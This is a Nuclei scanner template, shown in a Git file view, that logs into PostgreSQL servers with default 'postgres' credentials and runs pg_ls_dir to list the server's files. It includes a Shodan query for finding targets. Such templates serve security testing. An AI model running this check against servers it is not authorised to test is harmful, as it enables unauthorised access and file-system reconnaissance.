Files
nuclei-templates/javascript/enumeration/pgsql/pgsql-file-read.yaml

42 lines
1001 B
YAML
Raw Normal View History

2024-03-28 01:04:47 +05:30
id: postgresql-file-read
info:
name: PostgreSQL File Read
author: pussycat0x
severity: info
description: |
Read and list the files within the PostgreSQL database,
reference:
- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md#postgresql-file-read
metadata:
shodan-query: product:"PostgreSQL"
tags: js,network,postgresql
javascript:
- code: |
const postgres = require('nuclei/postgres');
const client = new postgres.PGClient;
connected = client.ExecuteQuery(Host, Port, User, Pass, Db, "select pg_ls_dir('./');");
Export(connected);
args:
Host: "{{Host}}"
Port: 5432
User: "{{usernames}}"
Pass: "{{password}}"
Db: "{{database}}"
payloads:
usernames:
- postgres
database:
- postgres
password:
- postgres
attack: clusterbomb
extractors:
- type: json
json:
- '.Rows[].pg_ls_dir'